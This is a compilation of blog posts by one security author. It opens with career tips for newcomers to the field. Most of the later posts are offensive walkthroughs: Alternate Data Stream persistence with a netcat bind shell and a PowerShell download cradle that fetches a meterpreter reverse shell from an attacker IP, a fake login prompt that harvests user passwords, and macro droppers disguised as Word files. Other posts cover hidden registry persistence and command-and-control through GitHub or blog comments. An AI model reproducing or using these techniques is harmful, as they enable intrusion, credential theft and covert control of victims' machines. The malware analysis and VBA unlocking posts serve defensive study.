10 Tips for Aspiring Security Professionals

Nobody enters a new profession as an expert. The information security industry is so lucrative right now that schools are now implementing Information Security programs. As some of you may know, I am currently 22 years old and about to graduate college with a degree in Information Security. I will be the very first to say that after 4 years in a program tailored to security, I have learned nothing that will ever directly apply to a job in Information Security. You may ask “How is that possible?”. The answer is simple. These degrees don’t teach you skills that you will use in the field, they teach you how to think critically, problem solve and most importantly, they teach you how to learn.

I am going through the same process that thousands of students (and others) are going through. Information Security is scary, overwhelming and fast paced. As someone entering the industry (especially if you are young), you have A LOT of catch up to do. Not only do you have to learn and understand current attacker methodology and techniques, you have to learn past methodologies and techniques as well. Combine this with the need to learn scripting, programming, networking, protocols, etc. and you will find yourself stressed out and overwhelmed. I have encountered this first hand and am even going through it as I write this and because of that, I want to give a few tips to those either entering the industry or thinking about entering the industry.

 

1. Passion is essential

“If you love what you do, you’ll never have to work a day in your life”

This says it all. Learning concepts isn’t hard when you want to learn it. Same goes for applying those concepts. If you have passion toward information security, you are miles ahead of the majority of other folks in the industry. There are a lot of people that do this job because of the money. I can honestly say that I would remain in the information security/offensive security industry if it paid minimum wage. The job is easy if you love it.

2. Never Stop Learning

Concepts, technology and methodology will always be changing. Not only do you have to learn the past, but you have to learn the present and the future. Be a sponge and absorb every little bit of information that you can.

3. Learn the basics

First, learn the basics of computers, networking and programming. If you have a genuine passion for computers, this will be easy. I recommend getting a job doing helpdesk or general systems administration. For example: I started working the helpdesk at a small company my sophomore year in college. All I did was fix monitors, printers and basic networking issues. After two years, I got a new job working the helpdesk and doing sysadmin work for a larger company. This gave me the opportunity to branch out and learn how a corporate network is setup and functions. I was able to learn the ins and outs of a domain and how it operates. With the basic understanding of how things work, you can then branch out into how to break them. Without this basic understanding, it will be hard to operate with an offensive (or defensive) mindset.

4. Dive in

From my experience, the only way to learn is to just jump in the deep end. Get in the weeds of things going on, even if you don’t understand it. The security industry is excellent at mentoring, so find few people and stick by them. Most of the security professionals understand that by investing in you, they will help bring up an additional professional in an industry that is in desperate need of passionate professionals.

5. Contribute

As I stated above, get in the weeds of things, even if you don’t understand it. There are TONS of open source projects and tools out there. Find some that interest you and try to contribute. Or, even better, start your own research. Contribute to the community by completing and sharing some of your own work. For example: When I first started, I had a massive interest in client side attacks. I started researching different client side attacks and in 2013, I found an old article from 2003 about malicious Microsoft Office macros. I decided to dive into that and started to do work geared towards using VBA macros in client side attacks.

6. Start a blog

This is something I cannot stress enough. By starting a blog, you are creating a portfolio of all your work. This is something other students and professionals can  reference. Employers also like it as it details all of your work. This goes with tip 5. As you do your own research/work, write about it. Not only will you be contributing to the community but you will also be building up a portfolio.

7. Keep your head up

As I previously mentioned, the security industry is awesome about mentoring. I should also note that there are also people that find joy in tearing you and your work down. As you learn and grow, realize that you are not an expert in everything and you are human. Humans make mistakes, so you will too. When that happens, chalk it up as a learning experience. Don’t get discouraged or angry. The industry revolves around learning, no matter how brilliant you are. For example: I did some research with Alternate Data Streams and using them with PowerShell and VBScript to obtain persistence on a compromised host. I did as much research as I could, wrote some code, published it and wrote a blog post. I was just entering into technology when Windows XP was phasing out so I had no experience with Alternate Data Streams. All I had was what I read and the code I wrote. When I published my blog post, I made the mistake of claiming this method of persistence as “Fileless”. As soon as I shared my post, I got torn apart by forensic and Incident Response professionals. They bashed me since Alternate Data Streams are not fileless, as I claimed them to be in my post. To be honest, I felt dumb and was tempted to just delete the post all together. This will happen to anyone that contributes, I promise. Instead of getting discouraged, I remained professional, fixed my blog post and thanked those who jumped at the opportunity to smack me in the face. I’m glad they did because now, I know that Alternate Data Streams are not fileless. I took that as an opportunity to learn from those who are smarter than me. Again, just keep learning.

8. Remember where you came from

As you grow as a student and professional, you will likely become an expert in the field at some point. When this happens, don’t turn into a gigantic asshole. As I previously mentioned, the security industry is awesome about mentoring but there are also people who will sit and wait for the opportunity to bring you down. A lot of people see those new to the industry as “n00bs”, “dumb” and “inexperienced” and in turn, won’t give them the time of day. When someone comes to you with a question, no matter how dumb, answer them. They are asking you for a reason and being an asshole about it helps nobody. You were in that spot once so when someone approaches you (or “sticks with you”, as mentioned in tip 4), take them in and give them guidance. I have started to see that the security industry is kind of like High School. There are different groups with different attitudes. Someone just entering the industry feels exactly like the first day of high school. They just want a friend. If you invest in someone, you will help grow them into a professional. This cycle repeats, so they will then hopefully do the same thing for the next rookie, etc.

9. Get yourself out there

Go to conferences and hang out with people. This is even more important when you are trying to get into the industry. By going to conferences, you can talk to people that you may see as an idol. Almost everyone will sit down with you and talk, because they understand the concept of not being an asshole. Those are the people you need to stick by. Example: I started my journey into information security in 2013. I knew nothing and I knew nobody. I had a small presence on Twitter where I just followed some security guys, but that was it. I couldn’t afford to go to a conference, so I didn’t. I made a comment on Twitter one day about wanting to go to DerbyCon sometime and was met with open arms. Tickets were sold out, but someone offered to sell me their ticket. I was thrilled, but couldn’t afford to buy the ticket or hotel, so I politely declined. A few minutes later, that same person decided to just give me their ticket. They didn’t know me or what I was about, but they gave me their ticket anyway. I told my parents that I was going to this conference and that I would be sleeping in my car. Luckily, they decided to pay for the hotel. I ended up going to DerbyCon in 2013 and had the time of my life. I met some awesome people, made some amazing friends and saw some awesome talks. Going to the conference, I knew nobody. After the conference, I felt like a part of the family.

10. Stay humble

There is not a single person that is an expert in everything. There will always be someone smarter than you in certain areas. Put your ego aside and accept that you are not the smartest expert in the field. The moment that your ego gets in the way is the moment that you stop learning and fall behind. Share your knowledge and expertise with others and take in the knowledge and expertise of others. Sharing is caring.

 

All I can say is stay true to yourself, contribute, get your name out there and never stop learning. When given the opportunity, share your experiences and knowledge with those who want to learn. Ask questions, learn and get in the weeds. The last thing the industry needs is a “professional” who runs Nessus and puts their logo on the report. 🙂

 

And most importantly, keep a good attitude and  have fun! 😀

 

@enigma0x3

Packager Shell Object being used as Infection Vector

Today, something interesting came across my desk. A user forwarded me an email that claimed to be an invoice and attached to it was a word document. At first, I was excited to take a look at another malicious office macro. When I opened the document, I was kind of let down. All I saw was an embedded Excel file:

1

 

Looking at the properties of that file, I quickly noticed that it wasn’t an excel file at all. When you double click on that file, you will notice that a VBScript file gets dropped into AppData\Local\Temp.

2

 

When I opened the VBScript file, this is what I saw:

5

I should note that I do not do malware analysis nor do I work in a full fledged security job. I just work the helpdesk. Since I have other stuff to do, I took a shortcut when analyzing this code. The part I was interested in is the “CreateObject” portion at the top. I set the first portion of that line to a variable and echoed it back:

6

Here is the result:

7

I did the same for the “run” portion of the “CreateObject” line:

8

And the result:

9

 

It appears that the attackers are disguising VBScript files as Excel files. When you double-click on the embedded file, it saves the VBScript file to %Temp% and runs. It then uses the well-known Powershell Cradle to fetch the payloads.

 

Just another interesting way attackers are combining and using Microsoft Office, VBScript and Powershell as an infection vector.

The SHA256 of the initial document is here: 9e73ab4798b8fb49645e2cbb54d6e85e396ef14feb43b5f53d555e92274e92aa

 

The SHA265 of the VBScript file is here:

b9b4d926ad3396440f775300960396429c102a0aac18da5733b47449ad4bf801

 

-Matt N. (@enigma0x3)

Manually Removing the Password from Malicious VBA Projects

Malicious actors are always looking for a way to deliver their malware to their targets. Recently, they have resorted to distributing malicious Office documents containing VBA macros. This method is often effective because all the user needs to do is click “Enable Macros” displayed in the document and code execution is achieved. They often rely on social engineering in order to persuade the target to run the macro. For example, a recent campaign has revealed that the authors will have the document display “encrypted” text. It will then ask the user to click “Enable Macros” in order to decrypt it. Once the macro is ran, it hides the “encrypted” text and then reveals actual readable text.

You can read more about this here

With the popularity of VBA macros increasing, attackers are now trying to find ways to prevent people from actually seeing what the malicious macro does. The most common method that I have seen is password protecting the project. This definitely keeps people from viewing the code, but with a little hex manipulation, you can remove that password.

I have had a few people ask me how to manually remove the password from a VBA project without using commercial tools. Luckily, you can accomplish the same task by using your favorite hex editor.

Do do so, just open the suspicious Office document in a hex editor. Once open, search for the string “DPB”:

3

 

 

All you have to do is replace that value with “DPX”. Once changed, save and close it:

4

When you re-open the document and click on “Visual Basic” in the Developer tab, you will get prompted with two errors shown below. Just click through them.

5

6

 

If you don’t have the developer tab, you can add it by going to file->Options->Customize Ribbon and checking the “Developer” checkbox on the right hand side.

Clicking on “Visual Basic” will open the Visual Basic Editor. From here, you can see/edit any new or existing projects. Right click on the malicious project and select “Project Properties”. Once the properties are displayed, select the “Protection” tab and uncheck the “Lock Project for Viewing” checkbox.

8

Save and close the document. When you re-open, you will be able to view the VBA project by going to the Developer tab and clicking “Visual Basic”. From there, the previously protected VBA project is now open and ready to be analyzed.

 

Thanks,
Matt N. (@enigma0x3)

Using Alternate Data Streams to Persist on a Compromised Machine

Back in the days before Windows Vista, Alternate Data Streams used to be an acceptable way for malware authors to hide their malicious code. An Alternate Data Stream can be used to hide the presence of secret or malicious files inside a legitimate file. By putting malware in an ADS, Windows will contain information for the legitimate file as well as the malicious file.

For example:

C:\>type C:\nc.exe > C:\windows\system32\calc.exe:svchost.exe

C:\>start /B C:\windows\system32\calc.exe:svchost.exe -d -L -p 2222 -e cmd.exe

The above commands will hide nc.exe in an Alternate Data Stream for calc.exe called svchost.exe and then start nc.exe from the ADS associated with calc.exe. Microsoft found this as an issue and removed the ability to run anything from ADS starting after Windows XP. In order to run your code that resides in an ADS, you would want to create a symlink using the mklink command. While this works, you have to have administrative rights on the machine in order to create the symlink. We all know users are not supposed to be running as an admin, so I tend to approach attack methods with the assumption that I will land on a box without admin rights.

 

Fortunately, I found a way to inject code into an Alternate Data Stream and execute it as a normal user. You can find the Powershell script here:

https://github.com/enigma0x3/Invoke-AltDSBackdoor/blob/master/Invoke-ADSBackdoor.ps1

 

This persistence method contains two items that almost all Penetration Testers like: The method’s ability to operate as a standard user and the ability to avoid detection. It is also important to know that Alternate Data Streams cannot be viewed unless you specify the /a /r command when doing a directory listing. This is appealing because of the stealth the ADS provides.

Once you have compromised a machine, you can run the above Powershell script. The script takes two parameters: -URL and -Arguments. -URL is the URL to your payload and -Arguments is for storing any parameters your payload requires. When specifying the arguments, you have to quote them. It will look similar to this: -Arguments “BadFunction -Lhost 192.168.1.11 -LPort 3333 -Payload weeeeee”. Note the “BadFunction” portion of the Arguments. If your Powershell script contains a function, you must include it as an argument.

 

Running this script on a compromised machine will look something like this. Depending on your payload, the string complexity will change. Here is an example that executes a payload with the function “hack” with no arguments. The function simply executes calc.exe:

int6

 

And here is an example that executes the function “Invoke-Shellcode” and passes LHost, LPort and Payload to the function:

int7

 

Looking at the command, we wrap the whole Powershell command in double quotes. That means when we get to our arguments, we have to quote them with single quotes:

powershell.exe -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.138/Invoke-ADSBackdoor.ps1’); Invoke-ADSBackdoor -URL http://192.168.1.138/Invoke-Shellcode.ps1 -Arguments ‘Invoke-Shellcode -LHost 192.168.1.138 -LPort 666 -Payload windows/meterpreter/reverse_https -Force’

 

After running the script, it will do the following:

-Encode the Powershell command that will execute your payload

-Create an Alternate Data Stream under the AppData folder and inject the Powershell Payload into it

-Create a VBS wrapper that will parse and execute the contents of the Alternate Data Stream containing the payload

-Create a second Alternate Data Stream under the AppData folder and inject the VBS wrapper into it

-Create a registry entry called “Update” in HKCU:\Software\Microsoft\Windows\CurrentVersion\Run

When the user logs on next, the Registry key will use wscript.exe to execute the Alternate Data Stream for the VBS wrapper. Once executed, the VBS wrapper will parse through and execute the contents of the Alternate Data Stream containing the payload.

After running the script, we can do a simple “dir” to see if we see it.

1

As you can see, the AppData folder isn’t showing up. This is because it is a hidden system folder. To see it, we can do a “dir /a”

2

As you can now see, the AppData folder is showing up. From the looks of it, everything is fine. There doesn’t appear to be anything attached to it. To see what Alternate Data Streams exist, we can do a “dir /a /r”

int1

 

Now we see two Alternate Data Streams under the AppData folder. One is called 4jrjuqekkpg.vbs and the other is called jkwsp3nf0ao.txt. These are the Alternate Data Streams that the Powershell persistence script created. It randomly generates a name for each Data Stream and shoves it into AppData. To see a little more about these two hidden streams, we can use streams.exe from SysInternals:

int2

This verifies that there are two Alternate Data Streams associated with the AppData folder. We can dig a little deeper into these streams by using “more”:

int3

Here we see that the Alternate Data Stream 4jrjuqekkpg.vbs  contains some VBScript. This is the wrapper that is simply used to suppress the shell prompt when Powershell and cmd.exe are executed. It then parses the Alternate Data Stream “jkwsp3nf0ao.txt” and executes it. This ensures that the user isn’t alerted to the attack. It is essential to know that 4jrjuqekkpg.vbs and jkwsp3nf0ao.txt are not written to the AppData folder, but instead are written to an Alternate Data Stream for AppData. Now that we know what the VBS wrapper does, let’s take a look at the ADS containing the payload:

int4

As you can see, the payload contains powershell.exe and an encoded string. To get more info on the payload, we can decode the string:

int5

Here we can see that the Alternate Data Stream jkwsp3nf0ao.txt actually contains code that shovels meterpreter back to an IP address on port 666 over HTTPS. The scary part about this is that most people have no idea Alternate Data Streams exist and if they do, they are unaware of how to go about looking for them. These Data Streams also don’t have much of a footprint on the file system.

 

As a recap, here is how this works. Run the Powershell script and specify a payload URL and any Arguments for the payload. The arguments need to be in quotes. The script will encode the Powershell command and inject it into an Alternate Data Stream under C:\Users\{username}\AppData while using a randomly generated file name. It will then inject some VBScript into a 2nd Alternate Data Stream that parses and executes the ADS containing the payload and then suppresses the console on execution. Once both Alternate Data Streams exist, it will then create a registry key that will use wscript.exe to run the Alternate Data Stream containing the VBS wrapper. When the VBS wrapper is executed, it will parse the Alternate Data Stream that contains the payload and execute it.

Remember, this persistence method works for standard user accounts and is fairly difficult to track down if you don’t know what to look for.

 

Have fun!

Matt N. (@enigma0x3)

Phishing for Credentials: If you want it, just ask!

**Update**

I have updated the script so it checks for credential validation. The prompt will not close until the user enters the correct password. Once validated, it will display the password for you.

Today, I was playing with Invoke-Mimikatz, which was created by @JosephBialek, which takes Mimikatz (created by @gentilkiwi) and loads it into memory. I absolutely LOVE this tool, but I get sad when I don’t have admin rights on the box and I don’t want to touch disk. If all you are after are the current user’s credentials (for email, vpn, network access), you can use this method. I initially thought of this after reading a report by FireEye regarding FIN4’s method of invoking an outlook login prompt when the macro is ran. You can find this report here

You can find my code here:

https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1

Basically, you compromise a machine using a malicious VBA macro or some sort of other vector. Once you have access to this machine, drop to a shell by typing “Shell” at the meterpreter prompt.

3333

 

From there, you can run the following command: powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString(‘URL_To_Invoke-LoginPrompt’)); Invoke-LoginPrompt

*When you add the URL to the Invoke-LoginPrompt script, make sure you use the “Raw” version on github or host your own*

33333322

 

When this runs, the user will get a prompt that is pre-populated with their domain and username.

22222

 

When the user enters their password, it will return it to you with the domain and the user’s username:

5555

 

From there, you can now login to whatever resources you want as that user.

 

 

 

Thanks,

Matt N. (@enigma0x3)

Using VBA, Powershell and GitHub to infect a machine

In my honest opinion, I feel like pentesters should try to incorporate some controlled malware into their engagements. The only issue with this is the customer won’t be comfortable with it and it is hard to come up with a controlled sample to use on someone’s production environment. To help this, I created a very (and I mean VERY) simple version of some “malware”. All this malware does is infect the machine via a VBA macro (which is making a comeback). Once it infects the machine, it checks in to GitHub every 20 minutes for commands.

 

Code is located here:

https://github.com/enigma0x3/Powershell-Infection/tree/master

 

Initiate.vbs: Silent wrapper that executes Powershell and then reads config.txt and invokes the commands (.txt is less suspicious then .ps1).

config.txt: Executes the “FetchCommands” function in the “infection.ps1” file on GitHub

ScheduledTask: Executes initiate.vbs which starts the parsing and execution of config.txt

 

The malware operates by checking the raw output of this file on github. This particular file has 2 functions which are “Infect” and “FetchCommands”. When the macro is opened, it executes the infect function which:

– creates 2 files. One in “$env:UserProfile\AppData\Local\Microsoft\Windows\Explorer” called config.txt and the other in “C:\Microsoft\Windows\Desktop” called initiate.vbs. It then sets both files to hidden.

 

1

 

– After the files are created, the infect function creates a scheduled task that executes “initiate.vbs” every 20 minutes.

 

2

 

*To simulate the 20 minute check-in, you can right click on the scheduled task and click “Run”

After the machine is infected, it will pull commands from the FetchCommands function in the Infection.ps1 file on GitHub. To issue add,remove or edit commands you want issued to the infected machine, simply make the changes in the FetchCommands function. (You will need to move this over to your own GitHub account to make changes)

 

The simplest usage of this is to use the FetchCommands function to Invoke a meterpreter shell when needed.

5

3

 

 

-Matt Nelson (@enigma0x3)

 

 

 

 

 

VBA & Powershell Malware

Here, I am going to walk through something I made. This is an attack that carries characteristics that malware authors normally include. This particular one has a characteristic used by Red October. There are 3 parts to this attack, the Office document you send to the target, the persistence file and Invoke-Shellcode. Invoke-Shellcode and the persistence file need to be hosted.

Setting up the attack:

1. The macro code goes as an auto_open macro in a word or excel document.

2. Make sure you have Invoke-Shellcode and the persistence file hosted and accessible. I implemented a little trick to get around appliances that block downloads of specific files, such as exe’s and vbscripts. As you can see below, I have 2 hosted files in /var/www/, one is invoke-shellcode and the other is the persistence file.

Screenshot_6

If you open the persistence file, you get this:

Screenshot_7

Obviously, this isn’t a word document. This is a VBScript that will get us our shell. What I have done is put this in a file called “Payment.docx”. If you try to copy and paste the persist code into a new file using nano or vi, it won’t work as it throws formatting off. To get this to execute correctly, you MUST create the persist script in notepad, save it as SomeFileName.vbs and then move the script to your linux machine. Once on your linux machine, you can move the file into /var/www and rename it using “mv persist.vbs Payment.docx”. Doing this will keep the formatting.

Screenshot_13

When the macro downloads it, it comes into the network and onto the target machine as a Word document instead of an obvious VBScript, exe or something.

Screenshot_8

The macro downloads Payment.docx and drops it in the hidden “Default” user folder. Once on the machine, it renames Payment.docx to “cookie.vbs” and sets the file attribute to “hidden”:

Screenshot_9

Screenshot_11

(After setting “Show hidden files and folders”):

Screenshot_12

Now that we have a VBScript in a hidden folder with hidden attributes, the macro then creates a registry key to call the script on startup. What is different about this, is it doesn’t use the run registry keys (that’s too obvious, right?). Instead, it creates a key called “Load” in HKCU\Software\Microsoft\Windows NT\CurrentVersion

Screenshot_10

Now, when the user logs in, it executes cookie.vbs and shovels out another shell. Some may wonder why I am using VBScript when Powershell exists. After some testing, Powershell pops a black DOS prompt when executing the script on startup. To get around this, I wrapped the Powershell script in VBScript to get rid of the obvious DOS prompt.

-Matt Nelson (@enigma0x3)

Command and Control using Powershell and your favorite website

When I went to Derbycon 3.0 last year, I saw @mattifestation and @obscuresec‘s talk about using pre-existing windows components for post-exploitation. What I absolutely loved was the section on using Powershell and a website for C2 after a compromise.

In a nutshell, you gain access to a system and create some way of getting script execution on startup (for persistence). This particular script is a rather neat one. What it does is define a key word and a website. It will check the website for the keyword and if it exists, it will execute a new payload using Invoke-Shellcode. Pretty badass, right? That means when you are ready for your shell back, you go to the website and enter the keyword. When the script goes to check the site, it will see the key word and execute a new payload. You can find their talk here

What I have done is implement this into a word macro that you send to a target.

 

You can find the code here: https://github.com/enigma0x3/Powershell-C2

When the target opens the document, you get a shell.

1

The macro also creates a registry key called WindowsUpdate in HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ that invokes the C2 script (you have to host Invoke-Shellcode and the C2 script).

2

So say you decide to close your sessions and go watch some ShmooCon talks. Once it is time to work again, simply fire up your multi/handler, point your browser to the website you set in your C2 script and create a comment with your magical word. Here is an example:

3

As you can see, I set my site to my blog and I set the keyword to h4x0r. So I go to my blog and create a comment using my keyword:

4

Since we created a registry key to execute our C2 script, it will start once the user logs in. When it comes to check the site for the keyword, it will find it and execute our payload:

5

And boom, we get a new shell:

6

This is a great way to get in and out without introducing anything new or making a lot of noise. Again, I have to give full credit to @mattifestation and @obscuresec for this fantastic method 🙂

-Matt Nelson (@enigma0x3)